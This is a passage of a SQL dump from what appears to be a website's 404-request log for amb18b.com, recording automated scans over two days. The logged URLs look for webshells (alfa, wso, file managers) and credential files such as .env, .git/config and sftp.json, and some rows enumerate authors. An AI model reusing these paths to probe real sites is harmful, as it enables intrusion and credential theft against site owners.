00:02:47'),(5614,'https://amb18b.com/wp-files.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:49','2025-11-10 00:02:49'),(5615,'https://amb18b.com/cloud.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:50','2025-11-10 00:02:50'),(5616,'https://amb18b.com/asa.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:51','2025-11-10 00:02:51'),(5617,'https://amb18b.com/gecko-litespeed.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:52','2025-11-10 00:02:52'),(5618,'https://amb18b.com/bolt.php','172.207.9.124','Direct Access',2,'2025-11-10 00:03:33','2025-11-10 00:02:53'),(5619,'https://amb18b.com/NewFile.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:55','2025-11-10 00:02:55'),(5620,'https://amb18b.com/otuz1.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:56','2025-11-10 00:02:56'),(5621,'https://amb18b.com/classwithtostring.php?p=','172.207.9.124','Direct Access',1,'2025-11-10 00:02:57','2025-11-10 00:02:57'),(5622,'https://amb18b.com/info.php','172.207.9.124','Direct Access',1,'2025-11-10 00:02:58','2025-11-10 00:02:58'),(5623,'https://amb18b.com/mlex.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:00','2025-11-10 00:03:00'),(5624,'https://amb18b.com/file1.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:01','2025-11-10 00:03:01'),(5625,'https://amb18b.com/11.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:03','2025-11-10 00:03:03'),(5626,'https://amb18b.com/warm.PhP7','172.207.9.124','Direct Access',1,'2025-11-10 00:03:04','2025-11-10 00:03:04'),(5627,'https://amb18b.com/zxl.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:05','2025-11-10 00:03:05'),(5628,'https://amb18b.com/wp-wso.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:06','2025-11-10 00:03:06'),(5629,'https://amb18b.com/uana.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:08','2025-11-10 00:03:08'),(5630,'https://amb18b.com/a.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:09','2025-11-10 00:03:09'),(5631,'https://amb18b.com/ayk.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:11','2025-11-10 00:03:11'),(5632,'https://amb18b.com/gawean.PhP7','172.207.9.124','Direct Access',1,'2025-11-10 00:03:12','2025-11-10 00:03:12'),(5633,'https://amb18b.com/inc.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:14','2025-11-10 00:03:14'),(5634,'https://amb18b.com/api.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:15','2025-11-10 00:03:15'),(5635,'https://amb18b.com/ioxi-rex4.php7','172.207.9.124','Direct Access',1,'2025-11-10 00:03:16','2025-11-10 00:03:16'),(5636,'https://amb18b.com/million.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:17','2025-11-10 00:03:17'),(5637,'https://amb18b.com/include.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:18','2025-11-10 00:03:18'),(5638,'https://amb18b.com/bala.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:20','2025-11-10 00:03:20'),(5639,'https://amb18b.com/category.tokens.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:21','2025-11-10 00:03:21'),(5640,'https://amb18b.com/mari.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:22','2025-11-10 00:03:22'),(5641,'https://amb18b.com/json.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:23','2025-11-10 00:03:23'),(5642,'https://amb18b.com/new.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:24','2025-11-10 00:03:24'),(5643,'https://amb18b.com/woh.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:26','2025-11-10 00:03:26'),(5644,'https://amb18b.com/admin-ajax.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:27','2025-11-10 00:03:27'),(5645,'https://amb18b.com/wp_mna.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:28','2025-11-10 00:03:28'),(5646,'https://amb18b.com/dex.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:30','2025-11-10 00:03:30'),(5647,'https://amb18b.com/file5.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:31','2025-11-10 00:03:31'),(5648,'https://amb18b.com/flower.php','172.207.9.124','Direct Access',1,'2025-11-10 00:03:34','2025-11-10 00:03:34'),(5649,'https://amb18b.com/network.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:07','2025-11-10 01:42:07'),(5650,'https://amb18b.com/f.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:09','2025-11-10 01:42:09'),(5651,'https://amb18b.com/NewFile.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:12','2025-11-10 01:42:12'),(5652,'https://amb18b.com/4.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:15','2025-11-10 01:42:15'),(5653,'https://amb18b.com/ss.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:18','2025-11-10 01:42:18'),(5654,'https://amb18b.com/1.php?','40.69.66.178','Direct Access',1,'2025-11-10 01:42:21','2025-11-10 01:42:21'),(5655,'https://amb18b.com/4.php?p=','40.69.66.178','Direct Access',1,'2025-11-10 01:42:24','2025-11-10 01:42:24'),(5656,'https://amb18b.com/ws.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:26','2025-11-10 01:42:26'),(5657,'https://amb18b.com/45.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:29','2025-11-10 01:42:29'),(5658,'https://amb18b.com/composer.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:32','2025-11-10 01:42:32'),(5659,'https://amb18b.com/dev.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:34','2025-11-10 01:42:34'),(5660,'https://amb18b.com/shout.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:37','2025-11-10 01:42:37'),(5661,'https://amb18b.com/alfa-shell-v4.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:39','2025-11-10 01:42:39'),(5662,'https://amb18b.com/wp-admin/images/wp-signup.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:42','2025-11-10 01:42:42'),(5663,'https://amb18b.com/files/css_compare.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:44','2025-11-10 01:42:44'),(5664,'https://amb18b.com/adminfuns.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:47','2025-11-10 01:42:47'),(5665,'https://amb18b.com/goat.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:49','2025-11-10 01:42:49'),(5666,'https://amb18b.com/assets/images/images.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:52','2025-11-10 01:42:52'),(5667,'https://amb18b.com/uploads/autoload_classmap.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:55','2025-11-10 01:42:55'),(5668,'https://amb18b.com/403.php','40.69.66.178','Direct Access',1,'2025-11-10 01:42:58','2025-11-10 01:42:58'),(5669,'https://amb18b.com/lock.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:00','2025-11-10 01:43:00'),(5670,'https://amb18b.com/go.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:03','2025-11-10 01:43:03'),(5671,'https://amb18b.com/wp-admin/includes/nav.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:04','2025-11-10 01:43:04'),(5672,'https://amb18b.com/termps.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:08','2025-11-10 01:43:08'),(5673,'https://amb18b.com/gel4y.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:12','2025-11-10 01:43:12'),(5674,'https://amb18b.com/fm2.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:14','2025-11-10 01:43:14'),(5675,'https://amb18b.com/es.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:19','2025-11-10 01:43:19'),(5676,'https://amb18b.com/atomlib.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:23','2025-11-10 01:43:23'),(5677,'https://amb18b.com/t.php?p=','40.69.66.178','Direct Access',1,'2025-11-10 01:43:27','2025-11-10 01:43:27'),(5678,'https://amb18b.com/wso-x569.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:30','2025-11-10 01:43:30'),(5679,'https://amb18b.com/wp-includes/ID3/rk2.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:34','2025-11-10 01:43:34'),(5680,'https://amb18b.com/file32.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:36','2025-11-10 01:43:36'),(5681,'https://amb18b.com/xc.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:39','2025-11-10 01:43:39'),(5682,'https://amb18b.com/default.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:41','2025-11-10 01:43:41'),(5683,'https://amb18b.com/admin1.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:43','2025-11-10 01:43:43'),(5684,'https://amb18b.com/index/fucku.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:45','2025-11-10 01:43:45'),(5685,'https://amb18b.com/wp-includes/Requests/Text/admin.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:47','2025-11-10 01:43:47'),(5686,'https://amb18b.com/wp-includes/24.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:52','2025-11-10 01:43:52'),(5687,'https://amb18b.com/wp-includes/certificates/plugins.php','40.69.66.178','Direct Access',1,'2025-11-10 01:43:57','2025-11-10 01:43:57'),(5688,'https://amb18b.com/wp-includes//wp-includes/atomlib.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:00','2025-11-10 01:44:00'),(5689,'https://amb18b.com/config.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:03','2025-11-10 01:44:03'),(5690,'https://amb18b.com/fm.php?fm=true','40.69.66.178','Direct Access',1,'2025-11-10 01:44:07','2025-11-10 01:44:08'),(5691,'https://amb18b.com/k90.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:15','2025-11-10 01:44:15'),(5692,'https://amb18b.com/.well-known/zaza.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:17','2025-11-10 01:44:17'),(5693,'https://amb18b.com/byp.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:21','2025-11-10 01:44:21'),(5694,'https://amb18b.com/wp-admin/setup-config.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:25','2025-11-10 01:44:25'),(5695,'https://amb18b.com/css.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:27','2025-11-10 01:44:27'),(5696,'https://amb18b.com/wp-includes/Text/Diff/Engine.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:31','2025-11-10 01:44:31'),(5697,'https://amb18b.com/wp-admin/fucku.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:38','2025-11-10 01:44:38'),(5698,'https://amb18b.com/we.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:41','2025-11-10 01:44:41'),(5699,'https://amb18b.com/2x.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:44','2025-11-10 01:44:44'),(5700,'https://amb18b.com/er.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:47','2025-11-10 01:44:47'),(5701,'https://amb18b.com/wp-includes/fonts/about.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:50','2025-11-10 01:44:50'),(5702,'https://amb18b.com/f35.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:53','2025-11-10 01:44:53'),(5703,'https://amb18b.com/wp-includes/IXR/admin.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:55','2025-11-10 01:44:55'),(5704,'https://amb18b.com/25.php','40.69.66.178','Direct Access',1,'2025-11-10 01:44:58','2025-11-10 01:44:58'),(5705,'https://amb18b.com/pepe.php','40.69.66.178','Direct Access',1,'2025-11-10 01:45:00','2025-11-10 01:45:00'),(5706,'https://amb18b.com/images/footer.php','40.69.66.178','Direct Access',1,'2025-11-10 01:45:06','2025-11-10 01:45:06'),(5707,'https://amb18b.com/.git/config','51.84.239.55','Direct Access',1,'2025-11-10 03:36:16','2025-11-10 03:36:16'),(5708,'https://amb18b.com/.git/config','108.136.47.182','Direct Access',1,'2025-11-10 03:48:19','2025-11-10 03:48:19'),(5709,'https://amb18b.com/?p=1','116.179.32.33','Direct Access',1,'2025-11-10 06:20:17','2025-11-10 06:20:17'),(5710,'https://amb18b.com/sites/all/libraries/plupload/examples/upload.php','94.74.182.45','Direct Access',1,'2025-11-10 10:26:13','2025-11-10 10:26:13'),(5711,'https://amb18b.com/register','103.186.31.44','Direct Access',1,'2025-11-10 14:45:06','2025-11-10 14:45:06'),(5712,'https://amb18b.com/.env','103.186.31.44','Direct Access',1,'2025-11-10 14:45:06','2025-11-10 14:45:06'),(5713,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-10 16:27:13','2025-11-10 16:27:13'),(5714,'https://amb18b.com/wp-plain.php','172.207.123.72','Invalid Referrer',1,'2025-11-10 16:27:13','2025-11-10 16:27:13'),(5715,'https://amb18b.com/','172.207.123.72','Invalid Referrer',2,'2025-11-10 16:27:17','2025-11-10 16:27:16'),(5716,'https://amb18b.com/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-10 16:27:17','2025-11-10 16:27:17'),(5717,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.207.123.72','Direct Access',1,'2025-11-10 16:27:18','2025-11-10 16:27:18'),(5718,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.207.123.72','Direct Access',1,'2025-11-10 16:27:20','2025-11-10 16:27:20'),(5719,'https://amb18b.com/old/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:49','2025-11-10 16:52:49'),(5720,'https://amb18b.com/backup/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:50','2025-11-10 16:52:50'),(5721,'https://amb18b.com/new/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:51','2025-11-10 16:52:51'),(5722,'https://amb18b.com/blog/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:53','2025-11-10 16:52:53'),(5723,'https://amb18b.com/wordpress/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:54','2025-11-10 16:52:54'),(5724,'https://amb18b.com/wp/','35.236.1.93','Direct Access',1,'2025-11-10 16:52:56','2025-11-10 16:52:56'),(5725,'https://amb18b.com/index.php?author=2','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:18','2025-11-10 23:27:18'),(5726,'https://amb18b.com/index.php?author=3','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:20','2025-11-10 23:27:20'),(5727,'https://amb18b.com/index.php?author=4','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:21','2025-11-10 23:27:21'),(5728,'https://amb18b.com/index.php?author=5','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:22','2025-11-10 23:27:22'),(5729,'https://amb18b.com/index.php?author=6','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:23','2025-11-10 23:27:23'),(5730,'https://amb18b.com/index.php?author=7','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:24','2025-11-10 23:27:24'),(5731,'https://amb18b.com/index.php?author=8','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:25','2025-11-10 23:27:25'),(5732,'https://amb18b.com/index.php?author=9','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:27','2025-11-10 23:27:27'),(5733,'https://amb18b.com/index.php?author=10','117.196.219.39','https://amb18b.com',1,'2025-11-10 23:27:28','2025-11-10 23:27:28'),(5734,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-11 01:30:52','2025-11-11 01:30:52'),(5735,'https://amb18b.com/wp-plain.php','172.207.123.72','Invalid Referrer',1,'2025-11-11 01:30:52','2025-11-11 01:30:52'),(5736,'https://amb18b.com/','172.207.123.72','Invalid Referrer',2,'2025-11-11 01:30:56','2025-11-11 01:30:56'),(5737,'https://amb18b.com/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-11 01:30:56','2025-11-11 01:30:56'),(5738,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.207.123.72','Direct Access',1,'2025-11-11 01:30:58','2025-11-11 01:30:58'),(5739,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.207.123.72','Direct Access',1,'2025-11-11 01:31:01','2025-11-11 01:31:01'),(5740,'https://amb18b.com/graphql','164.90.228.79','Direct Access',1,'2025-11-11 01:32:03','2025-11-11 01:32:03'),(5741,'https://amb18b.com/api','164.90.228.79','Direct Access',1,'2025-11-11 01:32:04','2025-11-11 01:32:04'),(5742,'https://amb18b.com/api/graphql','164.90.228.79','Direct Access',1,'2025-11-11 01:32:06','2025-11-11 01:32:06'),(5743,'https://amb18b.com/graphql/api','164.90.228.79','Direct Access',1,'2025-11-11 01:32:07','2025-11-11 01:32:07'),(5744,'https://amb18b.com/api/gql','164.90.228.79','Direct Access',1,'2025-11-11 01:32:08','2025-11-11 01:32:08'),(5745,'https://amb18b.com/swagger-ui.html','164.90.228.79','Direct Access',1,'2025-11-11 01:32:09','2025-11-11 01:32:09'),(5746,'https://amb18b.com/swagger/index.html','164.90.228.79','Direct Access',1,'2025-11-11 01:32:10','2025-11-11 01:32:10'),(5747,'https://amb18b.com/swagger/swagger-ui.html','164.90.228.79','Direct Access',1,'2025-11-11 01:32:11','2025-11-11 01:32:11'),(5748,'https://amb18b.com/webjars/swagger-ui/index.html','164.90.228.79','Direct Access',1,'2025-11-11 01:32:12','2025-11-11 01:32:12'),(5749,'https://amb18b.com/swagger.json','164.90.228.79','Direct Access',1,'2025-11-11 01:32:13','2025-11-11 01:32:13'),(5750,'https://amb18b.com/swagger/v1/swagger.json','164.90.228.79','Direct Access',1,'2025-11-11 01:32:14','2025-11-11 01:32:14'),(5751,'https://amb18b.com/v2/api-docs','164.90.228.79','Direct Access',1,'2025-11-11 01:32:15','2025-11-11 01:32:15'),(5752,'https://amb18b.com/v3/api-docs','164.90.228.79','Direct Access',1,'2025-11-11 01:32:17','2025-11-11 01:32:17'),(5753,'https://amb18b.com/api-docs/swagger.json','164.90.228.79','Direct Access',1,'2025-11-11 01:32:18','2025-11-11 01:32:18'),(5754,'https://amb18b.com/@vite/env','164.90.228.79','Direct Access',1,'2025-11-11 01:32:20','2025-11-11 01:32:20'),(5755,'https://amb18b.com/actuator/env','164.90.228.79','Direct Access',1,'2025-11-11 01:32:20','2025-11-11 01:32:20'),(5756,'https://amb18b.com/server','164.90.228.79','Direct Access',1,'2025-11-11 01:32:21','2025-11-11 01:32:21'),(5757,'https://amb18b.com/.vscode/sftp.json','164.90.228.79','Direct Access',1,'2025-11-11 01:32:23','2025-11-11 01:32:23'),(5758,'https://amb18b.com/about','164.90.228.79','Direct Access',1,'2025-11-11 01:32:24','2025-11-11 01:32:24'),(5759,'https://amb18b.com/debug/default/view?panel=config','164.90.228.79','Direct Access',1,'2025-11-11 01:32:25','2025-11-11 01:32:25'),(5760,'https://amb18b.com/v2/_catalog','164.90.228.79','Direct Access',1,'2025-11-11 01:32:26','2025-11-11 01:32:26'),(5761,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','164.90.228.79','Direct Access',1,'2025-11-11 01:32:27','2025-11-11 01:32:27'),(5762,'https://amb18b.com/server-status','164.90.228.79','Direct Access',1,'2025-11-11 01:32:29','2025-11-11 01:32:29'),(5763,'https://amb18b.com/login.action','164.90.228.79','Direct Access',1,'2025-11-11 01:32:30','2025-11-11 01:32:30'),(5764,'https://amb18b.com/_all_dbs','164.90.228.79','Direct Access',1,'2025-11-11 01:32:32','2025-11-11 01:32:32'),(5765,'https://amb18b.com/.DS_Store','164.90.228.79','Direct Access',1,'2025-11-11 01:32:33','2025-11-11 01:32:33'),(5766,'https://amb18b.com/.env','164.90.228.79','Direct Access',1,'2025-11-11 01:32:34','2025-11-11 01:32:34'),(5767,'https://amb18b.com/.git/config','164.90.228.79','Direct Access',1,'2025-11-11 01:32:36','2025-11-11 01:32:36'),(5768,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','164.90.228.79','Direct Access',1,'2025-11-11 01:32:37','2025-11-11 01:32:37'),(5769,'https://amb18b.com/config.json','164.90.228.79','Direct Access',1,'2025-11-11 01:32:39','2025-11-11 01:32:39'),(5770,'https://amb18b.com/telescope/requests','164.90.228.79','Direct Access',1,'2025-11-11 01:32:40','2025-11-11 01:32:40'),(5771,'https://amb18b.com/info.php','164.90.228.79','Direct Access',1,'2025-11-11 01:32:42','2025-11-11 01:32:42'),(5772,'https://amb18b.com/?author=2','196.251.81.111','Direct Access',1,'2025-11-11 02:06:55','2025-11-11 02:06:55'),(5773,'https://amb18b.com/?author=3','196.251.81.111','Direct Access',1,'2025-11-11 02:06:57','2025-11-11 02:06:57'),(5774,'https://amb18b.com/?author=4','196.251.81.111','Direct Access',1,'2025-11-11 02:06:59','2025-11-11 02:06:59'),(5775,'https://amb18b.com/?author=5','196.251.81.111','Direct Access',1,'2025-11-11 02:07:01','2025-11-11 02:07:01'),(5776,'https://amb18b.com/.env','2a14:7c1::2','Direct Access',1,'2025-11-11 05:27:17','2025-11-11 05:27:17'),(5777,'https://amb18b.com/manager.php?p=','172.172.116.210','Direct Access',1,'2025-11-11 05:38:02','2025-11-11 05:38:02'),(5778,'https://amb18b.com/js/fm.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:04','2025-11-11 05:38:04'),(5779,'https://amb18b.com/item.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:05','2025-11-11 05:38:05'),(5780,'https://amb18b.com/plugins/Cache/footer.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:07','2025-11-11 05:38:07'),(5781,'https://amb18b.com/404.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:10','2025-11-11 05:38:10'),(5782,'https://amb18b.com/mail.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:12','2025-11-11 05:38:12'),(5783,'https://amb18b.com/sx.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:14','2025-11-11 05:38:14'),(5784,'https://amb18b.com/wp-admin/maint/admin.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:16','2025-11-11 05:38:16'),(5785,'https://amb18b.com/article.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:18','2025-11-11 05:38:18'),(5786,'https://amb18b.com/alfa.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:20','2025-11-11 05:38:20'),(5787,'https://amb18b.com/1.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:22','2025-11-11 05:38:22'),(5788,'https://amb18b.com/403.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:24','2025-11-11 05:38:24'),(5789,'https://amb18b.com/link.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:25','2025-11-11 05:38:25'),(5790,'https://amb18b.com/byp.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:27','2025-11-11 05:38:27'),(5791,'https://amb18b.com/bak.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:29','2025-11-11 05:38:29'),(5792,'https://amb18b.com/ini.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:31','2025-11-11 05:38:31'),(5793,'https://amb18b.com/ws.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:33','2025-11-11 05:38:33'),(5794,'https://amb18b.com/wp-trackback.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:35','2025-11-11 05:38:35'),(5795,'https://amb18b.com/.well-known/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:37','2025-11-11 05:38:37'),(5796,'https://amb18b.com/wp-includes/certificates/plugins.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:39','2025-11-11 05:38:39'),(5797,'https://amb18b.com/chosen.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:47','2025-11-11 05:38:47'),(5798,'https://amb18b.com/wp-includes/ID3/about.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:49','2025-11-11 05:38:49'),(5799,'https://amb18b.com/css/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:51','2025-11-11 05:38:51'),(5800,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','172.172.116.210','Direct Access',1,'2025-11-11 05:38:53','2025-11-11 05:38:53'),(5801,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','172.172.116.210','Direct Access',1,'2025-11-11 05:38:55','2025-11-11 05:38:55'),(5802,'https://amb18b.com/filemanager/dialog.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:00','2025-11-11 05:39:00'),(5803,'https://amb18b.com/wp-admin/maint/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:02','2025-11-11 05:39:02'),(5804,'https://amb18b.com/wp-includes/Requests/Text/admin.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:05','2025-11-11 05:39:05'),(5805,'https://amb18b.com/wp-includes/customize/about.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:41','2025-11-11 05:39:41'),(5806,'https://amb18b.com/index/function.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:46','2025-11-11 05:39:46'),(5807,'https://amb18b.com/uploads/autoload_classmap.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:48','2025-11-11 05:39:48'),(5808,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:51','2025-11-11 05:39:51'),(5809,'https://amb18b.com/wp-includes/style-engine/about.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:53','2025-11-11 05:39:53'),(5810,'https://amb18b.com/.well-known/acme-challenge/mariju.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:55','2025-11-11 05:39:55'),(5811,'https://amb18b.com/about/function.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:57','2025-11-11 05:39:57'),(5812,'https://amb18b.com/wp-includes/theme-compat/chosen.php','172.172.116.210','Direct Access',1,'2025-11-11 05:39:59','2025-11-11 05:39:59'),(5813,'https://amb18b.com/admin/function.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:03','2025-11-11 05:40:03'),(5814,'https://amb18b.com/.well-known/acme-challenge/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:05','2025-11-11 05:40:05'),(5815,'https://amb18b.com/css/colors/blue/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:07','2025-11-11 05:40:07'),(5816,'https://amb18b.com/wp-admin/setup-config.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:12','2025-11-11 05:40:12'),(5817,'https://amb18b.com/wp-admin/js/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:17','2025-11-11 05:40:17'),(5818,'https://amb18b.com/wp-includes/assets/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:21','2025-11-11 05:40:21'),(5819,'https://amb18b.com/wp-includes/fonts/index.php?p=','172.172.116.210','Direct Access',1,'2025-11-11 05:40:24','2025-11-11 05:40:24'),(5820,'https://amb18b.com/.well-known/gecko-litespeed.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:26','2025-11-11 05:40:26'),(5821,'https://amb18b.com/.well-known/admin.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:28','2025-11-11 05:40:28'),(5822,'https://amb18b.com/.well-known/log.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:36','2025-11-11 05:40:36'),(5823,'https://amb18b.com/class.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:38','2025-11-11 05:40:38'),(5824,'https://amb18b.com/bless.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:41','2025-11-11 05:40:41'),(5825,'https://amb18b.com/wp-includes/js/codemirror/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:42','2025-11-11 05:40:42'),(5826,'https://amb18b.com/wp-includes/block-patterns/index.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:45','2025-11-11 05:40:45'),(5827,'https://amb18b.com/lock360.php','172.172.116.210','Direct Access',1,'2025-11-11 05:40:47','2025-11-11 05:40:47'),(5828,'https://amb18b.com/style.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:47','2025-11-11 10:26:47'),(5829,'https://amb18b.com/wp-admin/style.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:51','2025-11-11 10:26:51'),(5830,'https://amb18b.com/wp-includes/style.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:52','2025-11-11 10:26:52'),(5831,'https://amb18b.com/chosen.php?p=','103.186.30.186','Direct Access',1,'2025-11-11 10:26:54','2025-11-11 10:26:54'),(5832,'https://amb18b.com/file.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:55','2025-11-11 10:26:55'),(5833,'https://amb18b.com/flower.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:56','2025-11-11 10:26:56'),(5834,'https://amb18b.com/gifclass.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:57','2025-11-11 10:26:57'),(5835,'https://amb18b.com/bless.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:58','2025-11-11 10:26:58'),(5836,'https://amb18b.com/class-t.api.php','103.186.30.186','Direct Access',1,'2025-11-11 10:26:59','2025-11-11 10:26:59'),(5837,'https://amb18b.com/blurbs.php','103.186.30.186','Direct Access',1,'2025-11-11 10:27:00','2025-11-11 